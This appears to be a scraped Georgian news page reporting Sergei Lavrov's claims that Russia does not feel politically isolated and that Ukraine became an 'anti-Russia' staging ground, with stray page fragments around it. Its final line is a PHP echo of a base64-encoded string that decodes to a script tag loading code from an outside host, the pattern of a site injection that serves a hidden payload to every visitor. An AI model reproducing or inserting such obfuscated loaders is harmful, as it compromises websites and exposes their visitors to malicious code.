celsiusi
ავერსი შნაიდერი
რუსეთის საგარეო საქმეთა მინისტრი, სერგეი ლავროვი აცხადებს, რომ მოსკოვი არ გრძნობს „პოლიტიკურ მარტოობას“.
 
მისი თქმით, რუსეთის ფედერაცია დარწმუნებულია, რომ სწორად იქცევა და სამართლიანად იცავს თავის ინტერესებს.
 
„დარწმუნებულები ვართ, რომ სწორად ვიქცევით [უკრაინასთან დაკავშირებულ სიტუაციაში]. კეთილგანწყობა არ გვაკლია, მაგრამ არ შეგვიძლია და არ დავუშვებთ, რომ ჩვენი ინტერესები გამუდმებით ყველაზე უხეში გზით შეილახოს, რაც ფიზიკურ საფრთხეს შეუქმნის რუსეთის უსაფრთხოებას“, - განაცხადა ლავროვმა.
 
მისი მტკიცებით, უკრაინა "დიდი ხანია გადაიქცა "ანტირუსად" და მისგან ჩამოაყალიბეს" ყველაზე აქტიური პლაცდარმი ყველაფერი რუსულის შესალახად. ეს იყო დიდი გეოპოლიტიკური თამაშის ნაწილი", - ხაზგასმით აღნიშნა მან.
822
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");